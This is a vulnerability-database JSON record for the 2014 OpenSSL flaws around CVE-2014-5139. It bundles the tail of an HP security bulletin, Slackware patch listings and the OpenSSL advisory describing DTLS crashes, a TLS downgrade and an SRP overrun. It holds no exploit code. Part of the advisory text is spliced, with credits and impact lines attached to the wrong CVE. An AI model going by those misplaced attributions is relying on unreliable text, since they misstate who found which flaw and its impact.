running\nRHEL 5 x64. \nInitiate Install HP Management Agents for Windows x86/x64 job on the target\nrunning Windows. \n\nHISTORY\nVersion:1 (rev.1) - 1 April 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlUb+3EACgkQ4B86/C0qfVnD1wCg+LtrJpQcATsjJ308tHP49nog\n0sgAoJ5L9/aT7iAxhlnZdRatqjBoIFxb\n=pzE4\n-----END PGP SIGNATURE-----\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n This update fixes several security issues:\n Double Free when processing DTLS packets (CVE-2014-3505)\n DTLS memory exhaustion (CVE-2014-3506)\n DTLS memory leak from zero-length fragments (CVE-2014-3507)\n Information leak in pretty printing functions (CVE-2014-3508)\n Race condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)\n OpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n OpenSSL TLS protocol downgrade attack (CVE-2014-3511)\n SRP buffer overrun (CVE-2014-3512)\n Crash with SRP ciphersuite in Server Hello message (CVE-2014-5139)\n For more information, see:\n https://www.openssl.org/news/secadv_20140806.txt\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3505\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3511\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5139\n (* Security fix *)\npatches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zb-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-0.9.8zb-i486-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nUpdated packages for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.37.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nUpdated packages for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-1.0.1i-i486-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nUpdated packages for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-1.0.1i-x86_64-1_slack14.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nUpdated packages for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-1.0.1i-i486-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-1.0.1i-x86_64-1_slack14.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl-solibs-1.0.1i-i486-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl-1.0.1i-i486-1.txz\n\nUpdated packages for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl-solibs-1.0.1i-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl-1.0.1i-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 packages:\n30bdc015b10d8891b90d3f6ea34f5fdd openssl-0.9.8zb-i486-1_slack13.0.txz\n3dc4140c22c04c94e5e74386a5a1c200 openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 packages:\n3da32f51273762d67bf9dbcc91af9413 openssl-0.9.8zb-x86_64-1_slack13.0.txz\n075e5d12e5b909ecac923cb210f83544 openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nSlackware 13.1 packages:\n3b7e2bb2b317bf72b8f9b2b7a14bddfb openssl-0.9.8zb-i486-1_slack13.1.txz\n92af0784eade0674332a56bfab73b97d openssl-solibs-0.9.8zb-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 packages:\ndf5f961109d7b50971660ca6a7d4c48c openssl-0.9.8zb-x86_64-1_slack13.1.txz\n582aaeae3d56730a2e1538a67d4e44da openssl-solibs-0.9.8zb-x86_64-1_slack13.1.txz\n\nSlackware 13.37 packages:\n546445d56d3b367fa0dd4e80859c4620 openssl-0.9.8zb-i486-1_slack13.37.txz\nb80e9df8cdd0649939ec2fab20d24691 openssl-solibs-0.9.8zb-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 packages:\n9c9ce97dc21340924a3e27c1a8047023 openssl-0.9.8zb-x86_64-1_slack13.37.txz\n0fe1931f2fc82fb8d5fbe72680caf843 openssl-solibs-0.9.8zb-x86_64-1_slack13.37.txz\n\nSlackware 14.0 packages:\nd1580f4b22b99cee42b22276653c8180 openssl-1.0.1i-i486-1_slack14.0.txz\nec93cec2bcab8ae7391a504573cbc231 openssl-solibs-1.0.1i-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 packages:\n329475de3759225b1d02aa7317b2eb58 openssl-1.0.1i-x86_64-1_slack14.0.txz\n25f2a198022d974534986a3913ca705c openssl-solibs-1.0.1i-x86_64-1_slack14.0.txz\n\nSlackware 14.1 packages:\n8336457bc31d44ebf502ffc4443f12f7 openssl-1.0.1i-i486-1_slack14.1.txz\n4b99ac357fbd3065c53367eea246b8c7 openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 packages:\nf2b8f81d9d7dc02e5d1011f663ccc95d openssl-1.0.1i-x86_64-1_slack14.1.txz\n4360abffbb57cb18ba0720f782d78250 openssl-solibs-1.0.1i-x86_64-1_slack14.1.txz\n\nSlackware -current packages:\n49ecd332a899cf742d3467a6efe44269 a/openssl-solibs-1.0.1i-i486-1.txz\n27da017c49045981b1793f105aff365f n/openssl-1.0.1i-i486-1.txz\n\nSlackware x86_64 -current packages:\n8d74f3d770802182137c84d925f58cbc a/openssl-solibs-1.0.1i-x86_64-1.txz\nfd9d94d3210f0aedf74959cb0887e2b8 n/openssl-1.0.1i-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg openssl-1.0.1i-i486-1_slack14.1.txz openssl-solibs-1.0.1i-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. OpenSSL Security Advisory [6 Aug 2014]\n========================================\n\nInformation leak in pretty printing functions (CVE-2014-3508)\n=============================================================\n\nA flaw in OBJ_obj2txt may cause pretty printing functions such as\nX509_name_oneline, X509_name_print_ex et al. to leak some information from the\nstack. Applications may be affected if they echo pretty printing output to the\nattacker. OpenSSL SSL/TLS clients and servers themselves are not affected. \n\nThanks to Ivan Fratric (Google) for discovering this issue. This issue\nwas reported to OpenSSL on 19th June 2014. \n\nThe fix was developed by Emilia K\u00e4sper and Stephen Henson of the OpenSSL\ndevelopment team. This can\nbe exploited through a Denial of Service attack. \n\nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Joonas Kuorilehto and Riku Hietam\u00e4ki (Codenomicon) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 2nd July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nRace condition in ssl_parse_serverhello_tlsext (CVE-2014-3509)\n==============================================================\n\nIf a multithreaded client connects to a malicious server using a resumed session\nand the server sends an ec point format extension it could write up to 255 bytes\nto freed memory. \n\nOpenSSL 1.0.0 SSL/TLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 SSL/TLS client users should upgrade to 1.0.1i. \n\nThanks to Gabor Tyukasz (LogMeIn Inc) for discovering and researching this\nissue. This issue was reported to OpenSSL on 8th July 2014. \n\nThe fix was developed by Gabor Tyukasz. \n\n\nDouble Free when processing DTLS packets (CVE-2014-3505)\n========================================================\n\nAn attacker can force an error condition which causes openssl to crash whilst\nprocessing DTLS packets due to memory being freed twice. This can be exploited\nthrough a Denial of Service attack. \n\nThanks to Adam Langley and Wan-Teh Chang (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 6th June\n2014. \n\nThe fix was developed by Adam Langley. \n\n\nDTLS memory exhaustion (CVE-2014-3506)\n======================================\n\nAn attacker can force openssl to consume large amounts of memory whilst\nprocessing DTLS handshake messages. This can be exploited through a Denial of\nService attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\n\nDTLS memory leak from zero-length fragments (CVE-2014-3507)\n===========================================================\n\nBy sending carefully crafted DTLS packets an attacker could cause openssl to\nleak memory. This can be exploited through a Denial of Service attack. \n\nThanks to Adam Langley (Google) for discovering and researching this\nissue. This issue was reported to OpenSSL on 6th June 2014. \n\nThe fix was developed by Adam Langley. \n\nOpenSSL DTLS anonymous EC(DH) denial of service (CVE-2014-3510)\n===============================================================\n\nOpenSSL DTLS clients enabling anonymous (EC)DH ciphersuites are subject to a\ndenial of service attack. \n\nOpenSSL 0.9.8 DTLS client users should upgrade to 0.9.8zb\nOpenSSL 1.0.0 DTLS client users should upgrade to 1.0.0n. \nOpenSSL 1.0.1 DTLS client users should upgrade to 1.0.1i. \n\nThanks to Felix Gr\u00f6bert (Google) for discovering and researching this issue. \nThis issue was reported to OpenSSL on 18th July 2014. \n\nThe fix was developed by Emilia K\u00e4sper of the OpenSSL development team. \n\n\nOpenSSL TLS protocol downgrade attack (CVE-2014-3511)\n=====================================================\n\nA flaw in the OpenSSL SSL/TLS server code causes the server to negotiate\nTLS 1.0 instead of higher protocol versions when the ClientHello message is\nbadly fragmented. This allows a man-in-the-middle attacker to force a\ndowngrade to TLS 1.0 even if both the server and the client support a higher\nprotocol version, by modifying the client\u0027s TLS records. \n\nOpenSSL 1.0.1 SSL/TLS server users should upgrade to 1.0.1i. \n\nThanks to David Benjamin and Adam Langley (Google) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 21st July 2014. \n\nThe fix was developed by David Benjamin. \n\n\nSRP buffer overrun (CVE-2014-3512)\n==================================\n\nA malicious client or server can send invalid SRP parameters and overrun\nan internal buffer. Only applications which are explicitly set up for SRP\nuse are affected. \n\nThanks to Sean Devlin and Watson Ladd (Cryptography Services, NCC\nGroup) for discovering this issue. This issue was reported to OpenSSL\non 31st July 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv_20140806.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time", "sources": [ { "db": "NVD", "id": "CVE-2014-5139" }, { "db": "BID", "id": "69077" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" } ], "trust": 1.98 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-5139", "trust": 2.2 }, { "db": "BID", "id": "69077", "trust": 1.3 }, { "db": "SECUNIA", "id": "60022", "trust": 1.0 }, { "db": "SECUNIA", "id": "60810", "trust": 1.0 }, { "db": "SECUNIA", "id": "59700", "trust": 1.0 }, { "db": "SECUNIA", "id": "61100", "trust": 1.0 }, { "db": "SECUNIA", "id": "61392", "trust": 1.0 }, { "db": "SECUNIA", "id": "61959", "trust": 1.0 }, { "db": "SECUNIA", "id": "59710", "trust": 1.0 }, { "db": "SECUNIA", "id": "61017", "trust": 1.0 }, { "db": "SECUNIA", "id": "61171", "trust": 1.0 }, { "db": "SECUNIA", "id": "60917", "trust": 1.0 }, { "db": "SECUNIA", "id": "60493", "trust": 1.0 }, { "db": "SECUNIA", "id": "60921", "trust": 1.0 }, { "db": "SECUNIA", "id": "60803", "trust": 1.0 }, { "db": "SECUNIA", "id": "60221", "trust": 1.0 }, { "db": "SECUNIA", "id": "61775", "trust": 1.0 }, { "db": "SECUNIA", "id": "59756", "trust": 1.0 }, { "db": "SECUNIA", "id": "61184", "trust": 1.0 }, { "db": "SECTRACK", "id": "1030693", "trust": 1.0 }, { "db": "TENABLE", "id": "TNS-2014-06", "trust": 1.0 }, { "db": "JUNIPER", "id": "JSA10649", "trust": 0.3 }, { "db": "PACKETSTORM", "id": "130868", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131011", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131014", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132081", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "132080", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131254", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127811", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169648", "trust": 0.1 } ], "sources": [ { "db": "BID", "id": "69077" }, { "db": "PACKETSTORM", "id": "130868" }, { "db": "PACKETSTORM", "id": "131011" }, { "db": "PACKETSTORM", "id": "131014" }, { "db": "PACKETSTORM", "id": "130817" }, { "db": "PACKETSTORM", "id": "132081" }, { "db": "PACKETSTORM", "id": "132080" }, { "db": "PACKETSTORM", "id": "131254" }, { "db": "PACKETSTORM", "id": "127811" }, { "db": "PACKETSTORM", "id": "169648" }, { "db": "NVD", "id": "CVE-2014-5139" } ] }, "id": "VAR-201408-0212", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.42424244 }, "last_update_date": "2024-07-04T21:41:39.624000Z", "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2014-5139" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "https://www.openssl.org/news/secadv_20140806.txt" }, { "trust": 1.3, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:18.openssl.asc" }, { "trust": 1.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997" }, { "trust": 1.0, "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-008.txt.asc" }, { "trust": 1.0, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 1.0, "url": "http://lists.opensuse.org/opensuse-updates/2014-08/msg00036.html" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142350350616251\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624619906067\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624679706236\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142624719706349\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2" }, { "trust": 1.0, "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2" }, { "trust": 1.0, "url": "http://secunia.com/advisories/59700" }, { "trust": 1.0, "url": "http://secunia.com/advisories/59710" }, { "trust": 1.0, "url": "http://secunia.com/advisories/59756" }, { "trust": 1.0, "url": "http://secunia.com/advisories/60022" }, { "trust": 1.0, "url": "http://secunia.com/advisories/60221" }, { "trust": 1.0, "url": "http://secunia.com/advisories/60493" }, { "trust": 1.0, "url": "http://secunia.com/advisories/60803" }, { "trust": 1.0, "url": "http://secunia.com/advisories/60810" }, { "trust": 1.0, "url": "http://secunia.com/advisories/60917" }, { "trust": 1.0, "url": "http://secunia.com/advisories/60921" }, { "trust": 1.0, "url": "http://secunia.com/advisories/61017" }, { "trust": 1.0, "url": "http://secunia.com/advisories/61100" }, { "trust": 1.0, "url": "http://secunia.com/advisories/61171" }, { "trust": 1.0, "url": "http://secunia.com/advisories/61184" }, { "trust": 1.0, "url": "http://secunia.com/advisories/61392" }, { "trust": 1.0, "url": "http://secunia.com/advisories/61775" }, { "trust": 1.0, "url": "http://secunia.com/advisories/61959" }, { "trust": 1.0, "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml" }, { "trust": 1.0, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15567.html" }, { "trust": 1.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 1.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 1.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 1.0, "url": "http://www.debian.org/security/2014/dsa-2998" }, { "trust": 1.0, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-372998.htm" }, { "trust": 1.0, "url": "http://www.securityfocus.com/bid/69077" }, { "trust": 1.0, "url": "http://www.securitytracker.com/id/1030693" }, { "trust": 1.0, "url": "http://www.tenable.com/security/tns-2014-06" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=80bd7b41b30af6ee96f519e629463583318de3b0" }, { "trust": 1.0, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=83764a989dcc87fbea337da5f8f86806fe767b7e" }, { "trust": 1.0, "url": "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-september/000196.html" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139" }, { "trust": 0.7, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.7, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508" }, { "trust": 0.7, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568" }, { "trust": 0.3, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=80bd7b41b30af6ee96f519e629463583318de3b0" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021317" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2014-5139" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04571956" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574073" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04587108" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/151" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10649\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "aix.software.ibm.com/aix/efixes/security/openssl_advisory10.asc" }, { "trust": 0.3, "url": "http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512909" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04570627" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04624296" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684570" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685467" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682293" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097658" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1127491" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020240" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21683389" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098264" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682034" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686182" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682016" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15567.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966557" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683744" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3505" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3512" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3510" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3507" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3506" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-57ab6bb78b6e47a18718f44133" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-2557aa7dc1654cf6b547c1a9e4" }, { "trust": 0.2, "url": "http://www.hp.com/swpublishing/mtx-7b23e47d5d9b420b94bd1323eb" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_" }, { "trust": 0.2, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0160" }, { "trust": 0.1, "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-bd2042a1c7574aad90c4839efe" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-00eb9ac82e86449e8c3ba101bd" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-34bcab41ac7e4db299e3f5f2f1" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-062078f1ae354b7e99c86c151c" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-5827037475e44abab586463723" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3510" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3509" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3511" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3506" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3512" }, { "trust": 0.1, "url": 